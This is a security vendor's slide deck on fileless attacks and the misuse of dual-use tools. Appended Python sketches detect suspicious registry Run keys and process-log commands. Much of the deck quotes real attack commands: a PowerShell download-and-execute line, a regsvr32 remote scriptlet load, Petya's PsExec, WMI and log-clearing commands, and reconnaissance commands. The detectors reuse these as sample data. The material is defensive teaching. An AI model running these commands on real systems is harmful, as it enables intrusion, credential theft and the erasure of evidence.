Living off the land tactics, fileless attacks & dual-use tools
Copyright © 2017 Symantec Corporation
Definition: Living off the land
Only pre-installed software is used by the attacker and no additional binary executables are installed onto the system.
Living off the land
Attackers are using what’s already available to attack you:
o Fewer new files on disk → more difficult to detect the attack
o Use of off-the-shelf tools & cloud services → difficult to determine intent & source
o These tools are ubiquitous → hide in plain sight
o Finding exploitable zero-day vulnerabilities is getting more difficult → use simple and proven methods such as email & social engineering
«Fileless» attacks
Multiple fileless methods possible - not all are truly fileless:
o MEMORY ONLY ATTACKS: e.g. remote code exploits such as EternalBlue and CodeRed
o FILELESS LOADPOINT: hiding scripts in the registry, WMI or GPO, e.g. Poweliks and Kotver
o NON-PE FILES: documents with macros, PDFs with JavaScript and scripts (VBS, JavaScript, PowerShell, …)
o DUAL-USE TOOLS: using benign tools, such as PsExec, to do malicious things
Living off the land attack chain
1. INCURSION
o Exploit in memory, e.g. SMB EternalBlue
o Email with non-PE file, e.g. document macro
o Weak or stolen credentials, e.g. RDP password guess
o Remote script dropper, e.g. LNK with PowerShell from cloud
2. PERSISTENCE
o Non-persistent: memory only malware, e.g. SQL Slammer
o Persistent: fileless persistence loadpoint, e.g. JScript in registry
o Persistent: regular non-fileless method
3. PAYLOAD
o Regular non-fileless payload
o Non-PE file payload, e.g. PowerShell script
o Memory only payload, e.g. Mirai DDoS
o Dual-use tools, e.g. netsh or PsExec.exe
Section 1: Memory only attacks
Memory only attacks
Run malicious code only in memory, without writing any files to disk:
o Mainly remote code execution (RCE) exploits, like EternalBlue
o CodeRed in 2001 was the first widespread outbreak of this type
o A computer restart will clean/disinfect
o PowerShell can be used to load and execute a payload in memory
Attackers do not always need persistence:
o Mirai bot – re-infects the device after a restart if it gets cleaned
o Targeted attack groups – core systems do not get restarted often
Section 2: Dual-use tools
Dual-use tools
System tools and clean applications used for nefarious purposes. Some tools are pre-installed, some are downloaded by the attacker.
Type of internal activity | Purpose | Dual-use tools
o Internal network reconnaissance | Enumerate information about a target environment | net user, systeminfo, whoami, hostname, quser, ipconfig
o Credential harvesting | Obtain legitimate user credentials to gain access to target systems for malicious purposes | Mimikatz, WCE, pwdump
o Lateral movement | Gain deeper access into the target network | PsExec, PowerShell, WMI, RDP
o Data exfiltration | Send data back to the attackers | FTP, RAR, ZIP, iExplorer, PuTTY, PowerShell, rdpclip
o Fallback backdoor | Enables a backdoor that can be used should the main backdoor be removed | net user, RDP, Telnet server
Information gathering
o Many attack groups use common system tools during their attacks
WATERBUG/TURLA: systeminfo; net view; net view /domain; tasklist /v; gpresult /z; arp -a; net share; net use; net user administrator; net user /domain; net user administrator /domain; tasklist /fi
APPLEWORM/LAZARUS: hostname; whoami; ver; ipconfig -all; ping www.google.com; query user; net user; net view; net view /domain; tasklist /svc; netstat -ano | find TCP; msdtc [IP] [port]
BILLBUG: net user; ipconfig /all; net start; systeminfo; gpresult
Targeted attacks & dual-use tools
Group name | Reconnaissance | Credential harvesting | Lateral movement | Custom built tools
Tick | whoami, procdump, VBS | WCE, Mimikatz, gsecdump | PsExec | Yes
Waterbug | systeminfo, net, tasklist, gpresult, … | WCE, pwdump | Open shares | Yes
Suckfly | tcpscan, smbscan | WCE, gsecdump, credentialdumper | - | Yes
Fritillary | PowerShell, sdelete | Mimikatz, PowerShell | PsExec | Yes
Destroyer | Disk usage, event log viewer | kerberos manipulator | PsExec, curl, VNC | Yes
Chafer | network scanner, SMB bruteforcer | WCE, Mimikatz, gsecdump, … | PsExec | Yes
Greenbug | Broutlook | WCE, gsecdump, browdump, … | TeamViewer, PuTTY | Yes
Buckeye | os info, user info, smb enumerator, … | pwdump, Lazagne, chromedump, … | Open shares | Yes
Billbug | ver, net, gpresult, systeminfo, ipconfig, … | - | custom backdoor | Yes
Appleworm | net, netsh, query, telnet, find, … | dumping SAM | RDP bruteforcer, rdclip | Yes
Targeted attack groups
o 10 out of 10 groups analyzed used system tools in combination with custom tools during their attacks
o Application whitelisting often does not protect against such attacks
Examples:
o Petya used PsExec, WMI, and LSADump for lateral movement
o Calcium/Fin7 group used PowerShell payloads in attacks in 2017
o Attack against the DNC in 2016 used PowerShell for lateral movement and discovery and used a WMI fileless persistence method
Dual-use tools: global usage
o Mimikatz and PsExec are popular for lateral movement, e.g. Petya
(Figure: global usage of dual-use tools)
Example: Ransom.Petya
Petya uses dual-use tools
o Threat is a DLL executed by rundll32.exe
o Uses a recompiled version of the LSADump Mimikatz module to get passwords
o Uses PsExec to propagate
  o \\[server_name]\admin$\perfc.dat
  o psexec rundll32.exe c:\windows\perfc.dat #1 <rand>
o Uses WMI to propagate if PsExec fails
  o wmic.exe /node:[IP Address] /user:[USERNAME] /password:[PASSWORD] process call create "%System%\rundll32.exe \"%Windows%\perfc.dat\" #1 60"
o Creates a scheduled task to restart into the malicious MBR payload
  o schtasks /RU "SYSTEM" /Create /SC once /TN "" /TR "%system%\shutdown.exe /r /f" /ST 14:42
o Deletes log files to hide traces
  o wevtutil cl Setup & wevtutil cl System & … & fsutil usn deletejournal /D %C:
Example: Odinaff group
The Odinaff group used multiple dual-use tools in their attack:
o Mimikatz: an open source password recovery tool
o PsExec: a process execution tool from Microsoft
o Netscan: a network scanning tool
o Ammyy Admin: a remote access tool
o Gussdoor: a custom remote backdoor (Backdoor.Gussdoor)
o RunAs: a tool for running processes as another user
o PowerShell: various commands used
WMI usage in malware
o On average 2% of malware in our sandbox misused WMI
Usage of dual-use tools - January 2017
Tool | Usage count (%)
sc.exe 2.7190%
vnc 2.1176%
net.exe 1.2733%
powershell.exe 1.0263%
ipconfig.exe 0.8227%
netsh.exe 0.7526%
teamviewer.exe 0.6224%
tasklist.exe 0.4963%
rdpclip.exe 0.3226%
rar.exe 0.3139%
wmic.exe 0.3027%
find.exe 0.2767%
curl.exe 0.2027%
netstat.exe 0.1938%
systeminfo.exe 0.1641%
wget.exe 0.1208%
nc.exe 0.1174%
gpresult.exe 0.1147%
whoami.exe 0.1109%
ammyy.exe 0.1061%
o System tools are popular with administrators and cyber criminals
o Remote administration tools are often misused by attackers
Usage of dual-use tools
o PowerShell is still gaining popularity with attackers
Section 3: Non-PE files (PE = Portable Executables)
Malicious documents still popular
o Malicious macro with social engineering
o Embedded binary can be double clicked
Non-PE files
o Scripts are very popular, especially PowerShell
o Many script toolkits are available
o Scripts are easy to obfuscate and difficult to detect with signatures
o Scripts are flexible and can be quickly adapted if needed
Example PowerShell downloader:
powershell.exe -nop -ep Bypass -noexit -c
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $true };
iex ((New-Object System.Net.WebClient).DownloadString('[REMOVED]'))
Common malware use cases for PowerShell
o DOWNLOADER: PowerShell script used to download a payload to disk or memory. Often used in email attachments such as WSF or document macros.
o LOADPOINT: PowerShell script used as a persistent loadpoint on Windows. Often stored completely in the registry (fileless), e.g. Kotver, or within WMI.
o LATERAL MOVEMENT: PowerShell remoting to execute on a remote computer (Invoke-Command). Download and execute Mimikatz, etc. in order to steal credentials.
Email script downloaders
(Figure: detections by month for JavaScript and macro downloaders)
Attachment file extensions
o Malicious attachments with HTML code gained popularity in 2017
Prevalence of PowerShell
o 95.4% of the PowerShell scripts submitted to Blue Coat MAA were malicious
(Figure: volume of PowerShell samples from customers in our sandbox in 2016)
TOP 3 THREATS THAT USE POWERSHELL
1. 9.4% W97M.Downloader
2. 4.5% Trojan.Kotver
3. 4.0% JS.Downloader
Section 4: Fileless loadpoints
Fileless loadpoints
There are many ways to have a loadpoint without adding a new file:
o Windows registry
o Windows Management Instrumentation (WMI)
o Group Policy Objects (GPO)
o Scheduled task
o …
Script embedded in the registry
Common: a Windows registry run key that points to the malware binary file.
New trick: a Windows registry run key that contains a script which gets executed.
o This script can load more payloads from other registry keys and run them
o As the script is not in a file on disk it might be missed by traditional security tools
Example: Poweliks
o Multiple stages in the registry
o Uses JavaScript and PowerShell
o Loads a DLL directly into memory
o Decrypted directly in memory
o Uses a non-printable ASCII character to protect its own registry key
Remote SCT load
o A registry run key can also point to a remote SCT file
o Regsvr32 will download and execute the embedded JScript
Regsvr32 /s /n /u /i:%REMOTE_MALICIOUS_SCT_SCRIPT% scrobj.dll
Example: Downloader.Dromedan (40,000 detections / day)
o Embedded JScript uses WMI to execute a PowerShell payload
o Script stores an encoded DLL in the registry for later
(Figure: Malicious.sct file)
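Added example, not code from the deck or from Symantec, for the registry-embedded script and remote SCT loadpoints described on the three preceding slides: a Python triage of a regedit export of a Run key that flags values launching a script host instead of a program file, regsvr32 with /i: and scrobj.dll, inline download-and-execute content, and value names containing non-printable characters (the Poweliks trick). The .reg sample, its value names and the finding labels are constructed assumptions.

```python
import re
import string

# Constructed regedit export (.reg) of a Run key with three values: a benign
# program path, a regsvr32 entry that pulls a remote .sct, and a value whose
# name starts with a non-printable character and whose data is an inline
# PowerShell command instead of a path (sample data, not a real export).
SAMPLE_REG = (
    "Windows Registry Editor Version 5.00\n"
    "\n"
    "[HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run]\n"
    '"OneDrive"="\\"C:\\\\Users\\\\alice\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\OneDrive.exe\\" /background"\n'
    '"Updater"="regsvr32 /s /n /u /i:%REMOTE_MALICIOUS_SCT_SCRIPT% scrobj.dll"\n'
    '"\x01Health"="powershell.exe -nop -ep Bypass -noexit -c iex '
    "((New-Object System.Net.WebClient).DownloadString('[REMOVED]'))\"\n"
)

KEY_RE = re.compile(r"^\[(.+)\]$")
# "name"="data" with the .reg escapes \" and \\ allowed inside both strings
VALUE_RE = re.compile(r'^"((?:[^"\\]|\\.)*)"="((?:[^"\\]|\\.)*)"$')
# Images that execute script content rather than a compiled program
SCRIPT_HOSTS = {"powershell", "wscript", "cscript", "mshta", "regsvr32", "rundll32", "cmd"}


def unescape(s):
    """Undo .reg string escaping: \\" -> " and \\\\ -> \\."""
    return re.sub(r"\\(.)", r"\1", s)


def parse_reg(text):
    """Return a list of {key, name, data} dicts for every string value in the export."""
    key, values = None, []
    for raw in text.splitlines():
        line = raw.strip()
        km = KEY_RE.match(line)
        if km:
            key = km.group(1)
            continue
        vm = VALUE_RE.match(line)
        if vm and key:
            values.append({"key": key, "name": unescape(vm.group(1)), "data": unescape(vm.group(2))})
    return values


def launched_image(data):
    """Image name the value would launch: quoted or first token, path and .exe stripped."""
    m = re.match(r'"([^"]+)"|(\S+)', data)
    first = (m.group(1) or m.group(2)) if m else ""
    base = re.split(r"[\\/]", first)[-1].lower()
    return base[:-4] if base.endswith(".exe") else base


def classify_value(name, data):
    """Sorted list of finding labels for one Run value; empty means nothing suspicious."""
    findings = []
    # Poweliks-style hidden entry: name that regedit cannot display properly
    if name == "" or any(ch not in string.printable for ch in name):
        findings.append("non_printable_name")
    image = launched_image(data)
    if image in SCRIPT_HOSTS:
        findings.append("script_host_loadpoint")
    # Dromedan-style loadpoint: regsvr32 /i:<remote scriptlet> scrobj.dll
    if image == "regsvr32" and re.search(r"/i:\S+", data) and "scrobj.dll" in data.lower():
        findings.append("regsvr32_remote_sct")
    # Download-and-execute traits of the PowerShell downloader shown earlier
    if re.search(r"\biex\b|DownloadString|-ep\s+bypass|-nop\b", data, re.I):
        findings.append("inline_script_content")
    return sorted(findings)


def triage(reg_text):
    """Values from the export that carry at least one finding, in file order."""
    results = []
    for v in parse_reg(reg_text):
        findings = classify_value(v["name"], v["data"])
        if findings:
            results.append({**v, "findings": findings})
    return results


if __name__ == "__main__":
    for hit in triage(SAMPLE_REG):
        print(f"{hit['key']}\\{hit['name']!r}: {', '.join(hit['findings'])}")
```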
Fileless loadpoints
Similar trigger methods exist for:
o Windows Management Instrumentation (WMI)
o Group Policy Objects (GPO)
o Scheduled task
(Figure: WMI PowerShell backdoor)
Not truly fileless loadpoints
Without additional files, but writing to existing files:
o File infector: infect any file that gets restarted with the PC
o Browser files: infect the core browser files or extensions
o PowerShell profile: add a malicious script to the profile file
o Trigger on shutdown: remove itself once started and write a registry run key when system shutdown is called
o BITSadmin: add a malicious update server as backdoor
Detection challenges
o If no file is written to disk → security measures might not work
o Lack of indicators of compromise (IoCs) for sharing
o Common malware does not always use a loadpoint anymore
o Symantec has various detection features in place for such threats
Mitigation & best practices
o Monitor the use of dual-use tools inside your network
o Block remote execution through PsExec and WMI (if applicable)
o Enable better logging and process the information (if applicable)
o Enable advanced account security features, like 2FA and login notification (if applicable)
o Protect against password and credential theft, for example with behavior-based security solutions
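Added example, not code from the deck or from Symantec, of the "monitor the use of dual-use tools" and "enable better logging and process the information" advice above: a Python sketch that runs narrow rules built from the command shapes shown on the slides (the PowerShell downloader flags, Petya's WMI, PsExec, schtasks and log-clearing commands, an Office application spawning a script host) over constructed process-creation log lines, and flags a host that runs many distinct reconnaissance tools from the slides' lists. The log format, host and user names, rule names and the threshold of four tools are assumptions.

```python
import re
from collections import defaultdict

# Constructed sample of simplified process-creation events (timestamp, host, user,
# parent image, command line). Attacker lines reuse the command shapes shown on the
# slides (PowerShell downloader, Petya's WMI, PsExec, schtasks and log-clearing
# commands, plus a recon burst); the last three lines are benign admin activity.
SAMPLE_LOG = """\
2017-06-27T10:15:02Z host=WS01 user=CORP\\alice parent=winword.exe cmd=powershell.exe -nop -ep Bypass -noexit -c iex ((New-Object System.Net.WebClient).DownloadString('[REMOVED]'))
2017-06-27T10:16:01Z host=WS01 user=CORP\\alice parent=cmd.exe cmd=whoami
2017-06-27T10:16:02Z host=WS01 user=CORP\\alice parent=cmd.exe cmd=systeminfo
2017-06-27T10:16:03Z host=WS01 user=CORP\\alice parent=cmd.exe cmd=net user /domain
2017-06-27T10:16:04Z host=WS01 user=CORP\\alice parent=cmd.exe cmd=ipconfig /all
2017-06-27T10:16:05Z host=WS01 user=CORP\\alice parent=cmd.exe cmd=tasklist /svc
2017-06-27T10:16:06Z host=WS01 user=CORP\\alice parent=cmd.exe cmd=gpresult /z
2017-06-27T11:02:10Z host=SRV02 user=SYSTEM parent=rundll32.exe cmd=wmic.exe /node:[IP] /user:[USER] /password:[PASS] process call create "%System%\\rundll32.exe %Windows%\\perfc.dat #1 60"
2017-06-27T11:02:11Z host=SRV02 user=SYSTEM parent=rundll32.exe cmd=psexec rundll32.exe c:\\windows\\perfc.dat #1 60
2017-06-27T11:02:12Z host=SRV02 user=SYSTEM parent=rundll32.exe cmd=schtasks /RU "SYSTEM" /Create /SC once /TN "" /TR "%system%\\shutdown.exe /r /f" /ST 14:42
2017-06-27T11:02:13Z host=SRV02 user=SYSTEM parent=cmd.exe cmd=wevtutil cl Setup & wevtutil cl System & fsutil usn deletejournal /D C:
2017-06-27T11:30:00Z host=WS03 user=CORP\\bob parent=explorer.exe cmd=notepad.exe C:\\notes.txt
2017-06-27T11:31:00Z host=WS03 user=CORP\\bob parent=cmd.exe cmd=ipconfig /all
2017-06-27T12:00:00Z host=ADMIN01 user=CORP\\ops parent=cmd.exe cmd=powershell.exe -File C:\\Scripts\\inventory.ps1
"""

EVENT_RE = re.compile(r"^(\S+) host=(\S+) user=(\S+) parent=(\S+) cmd=(.*)$")

# One compiled pattern per behaviour the deck calls out; kept narrow on purpose.
COMMAND_RULES = {
    "powershell_downloader": re.compile(
        r"powershell(?:\.exe)?\b.*(?:-nop\b|-ep\s+bypass|\biex\b|DownloadString|"
        r"ServerCertificateValidationCallback)", re.I),
    "wmic_remote_process_create": re.compile(
        r"wmic(?:\.exe)?\b.*/node:.*process\s+call\s+create", re.I),
    "psexec_rundll32": re.compile(r"psexec(?:\.exe)?\b.*rundll32", re.I),
    "schtasks_forced_reboot": re.compile(
        r"schtasks(?:\.exe)?\b.*shutdown(?:\.exe)?\s+/r\b", re.I),
    "log_clearing": re.compile(
        r"wevtutil(?:\.exe)?\s+cl\b|fsutil(?:\.exe)?\s+usn\s+deletejournal", re.I),
}
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell", "cmd", "wscript", "cscript", "mshta", "regsvr32", "rundll32"}
# Reconnaissance tools from the slides; many distinct ones on one host is the signal.
RECON_TOOLS = {"systeminfo", "whoami", "hostname", "quser", "ipconfig", "net", "tasklist",
               "gpresult", "arp", "netstat", "query", "ver", "ping"}


def parse_event(line):
    """Return the event as a dict, or None for lines that do not match the format."""
    m = EVENT_RE.match(line.strip())
    if not m:
        return None
    ts, host, user, parent, cmd = m.groups()
    return {"ts": ts, "host": host, "user": user, "parent": parent.lower(), "cmd": cmd}


def tool_name(cmd):
    """Image name of the launched program: first token, path and '.exe' stripped."""
    parts = cmd.split()
    first = parts[0].strip('"') if parts else ""
    base = re.split(r"[\\/]", first)[-1].lower()
    return base[:-4] if base.endswith(".exe") else base


def match_rules(cmd, parent=""):
    """Names of all rules the command line triggers (sorted, possibly empty)."""
    hits = [name for name, rx in COMMAND_RULES.items() if rx.search(cmd)]
    # Macro-to-script chain: an Office application starting a script host
    if parent.lower() in OFFICE_PARENTS and tool_name(cmd) in SCRIPT_HOSTS:
        hits.append("office_spawns_script_host")
    return sorted(hits)


def analyze(log_text, recon_threshold=4):
    """Run the rules over a log; return per-event alerts and hosts with a recon burst."""
    alerts, recon_by_host = [], defaultdict(set)
    for line in log_text.splitlines():
        ev = parse_event(line)
        if ev is None:
            continue
        rules = match_rules(ev["cmd"], ev["parent"])
        if rules:
            alerts.append({"ts": ev["ts"], "host": ev["host"], "rules": rules, "cmd": ev["cmd"]})
        tool = tool_name(ev["cmd"])
        if tool in RECON_TOOLS:
            recon_by_host[ev["host"]].add(tool)
    recon_hosts = {h: sorted(t) for h, t in recon_by_host.items() if len(t) >= recon_threshold}
    return {"alerts": alerts, "recon_hosts": recon_hosts}


if __name__ == "__main__":
    result = analyze(SAMPLE_LOG)
    for a in result["alerts"]:
        print(f"{a['ts']} {a['host']} {','.join(a['rules'])}: {a['cmd'][:60]}")
    for host, tools in result["recon_hosts"].items():
        print(f"recon burst on {host}: {', '.join(tools)}")
```

A single benign `ipconfig /all` on WS03 stays below the threshold, which is the point of counting distinct tools per host rather than alerting on each one.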
Protection solutions
Symantec Endpoint Protection (SEP) 14: reputation, machine learning, behavior detection, emulation, exploit mitigation, IPS, …
• Deepsight IoC feeds
• MATI custom reports
• Threat Intelligence
• Managed Security Services (MSS)
• Incident Response (IR) on site
• Data Loss Prevention (DLP)
• Proxy SG secure web gateway
• Security Analytics
• Web Security Service
• Data Center Security (DCS)
• Control Compliance Suite (CCS)
• Public awareness/white papers
• Law enforcement collaboration
• Infrastructure takedowns
• Email Security.cloud
• MAA Sandbox
• Advanced Threat Protection (ATP)
• …
(Figure labels: Attacker, Organization, Users)
Symantec: Robust protection against fileless threats
Advanced Antivirus Engine
o Symantec uses an array of detection engines including an advanced signature-based antivirus engine with heuristics, just-in-time (JIT) memory scanning, an emulator and advanced machine-learning engines. This allows for the detection of fileless threats executed directly in memory.
SONAR Behavior Engine
o SONAR is Symantec’s real-time behavior-based protection that blocks potentially malicious applications from running on the computer. It detects malware without requiring any specific detection signatures. SONAR uses heuristics, reputation data, and behavioral policies to detect emerging and unknown threats.
Email Protection
o Email-filtering services such as Symantec Email Security.cloud can block malicious emails before they reach users. Symantec Messaging Gateway’s Disarm Technology can also protect by removing malicious content before it even reaches the user.
Malware Analysis Sandbox
o Sandboxes such as Blue Coat Malware Analysis have the capability to analyze and block malicious scripts, including PowerShell scripts. The technology can overcome multiple layers of obfuscation to detect deeply hidden suspicious behavior.
Network Protection
o Symantec’s Secure Web Gateway, and IPS and firewall on the endpoint, can monitor and block malicious traffic entering or leaving a system and can help minimize the impact of attacks. Suspicious content can be automatically analyzed in sandboxes.
System Hardening
o Symantec’s system hardening solution, Symantec Data Center Security, can secure physical and virtual servers, and monitor the compliance posture of server systems for on-premise, public, and private cloud data centers. By defining allowed behavior, Symantec Data Center Security can limit the use of scripts and any of their actions.
Visibility and Services
o Symantec’s Managed Security Services can help with threat intelligence, with proactive threat hunting, as well as incident response handling.
Conclusion
o Nearly all targeted attack groups use system tools in their attacks
o Sandboxes are often not able to handle fileless attacks properly
o Fileless attacks are difficult to detect as they leave fewer traces
o Application whitelisting will not protect against all living off the land tactics
o Script attacks, especially PowerShell, are increasing
Further reading
o BLOG: Attackers are increasingly living off the land
o WHITEPAPER: Living off the land and fileless attack techniques
Thank you

Living off the land and fileless attack techniques


Editor's Notes

  • #6 Incursion: This could be achieved by exploiting a remote code execution (RCE) vulnerability to run shell code directly in memory. More commonly it is an email with a malicious script inside a document or hidden in another host file such as a LNK file. The threat may implement multiple stages with downloader or self-decrypting parts, each of which might follow living off the land techniques again. Another method is misusing system tools by simply logging in with a stolen or guessed password. Persistence: Once the computer is compromised, stage two may or may not be fileless with regard to the persistence method. The threat may also not be persistent at all, depending on what the end goal is for the attacker. Payload: The payload of the threat often makes use of dual-use tools.
  • #14 No direct combo link visible.
  • #19 In some cases, administrative software packages are misused. The group behind Trojan.Jokra hijacked the legitimate patch and security update process within one of the compromised targets. Piggybacking on this system allowed the attacker to quickly distribute their payload to almost all computers in the target organization. Another example of an attack group misusing pre-existing software is the Butterfly group. This targeted attack group took advantage of internal systems to spread through a network once they gained initial access. In one instance, the attackers used a Citrix profile management application to create a backdoor on a newly infected system. This application can be used to install other applications or manage a user’s profile for authentication. It’s likely that the attackers took advantage of this system and placed the backdoor in a specific profile, which was triggered when the profile’s owner logged in. In the second incident, the TeamViewer application was used to create copies of Backdoor.Jiripbot on compromised computers. TeamViewer was legitimately present on the computers and was taken advantage of by the attackers.
  • #20 Image from PDF.
  • #24 Downloaders are very often used in email attachments like JS.Downloader or W97M.Downloader, which drop a VBS/JS script which in turn starts the PowerShell downloader. The payload can be downloaded to memory and executed without file writes.
  • #25 A notable trend during 2016 was a shift in the type of downloader used to deliver some of the most prolific threats. At the beginning of the year, Office documents with malicious macros (W97M.Downloader and variants) were the most popular form of downloader and were used in campaigns delivering threats such as Dridex (W32.Cridex). During March 2016, a shift occurred and the use of JavaScript downloaders (JS.Downloader and variants) increased significantly. While the propagation of Office macro downloaders has been lower throughout the year, Symantec doesn’t believe that this vector will disappear. In fact, we can see that W97M.Downloader detections spiked in December, although JS.Downloader continues to dominate. Within the shift to JavaScript downloaders, Symantec saw a significant increase in the use of malicious WSF (Windows Script File) attachments (also detected as JS.Downloader) from July onwards. WSF files are designed to allow a mix of scripting languages within a single file. They are opened and run by the Windows Script Host (WSH). Their use as malicious attachments may be due to the fact that files with the .wsf extension are not automatically blocked by some email clients and can be launched like an executable file. Ransomware, in particular, has been distributed employing this new tactic. In the second half of 2016, Symantec blocked a range of major campaigns distributing Locky (Ransom.Locky) that involved malicious WSF files.
  • #27 In 2016, 49,127 PowerShell scripts were submitted to the Blue Coat Malware Analysis sandbox; 95.4% were malicious. The graph is from 4,780 samples in RATS, so it’s only a subset, but it reflects what our customers deal with.
  • #29 Autoruns can help identify loadpoints in Windows.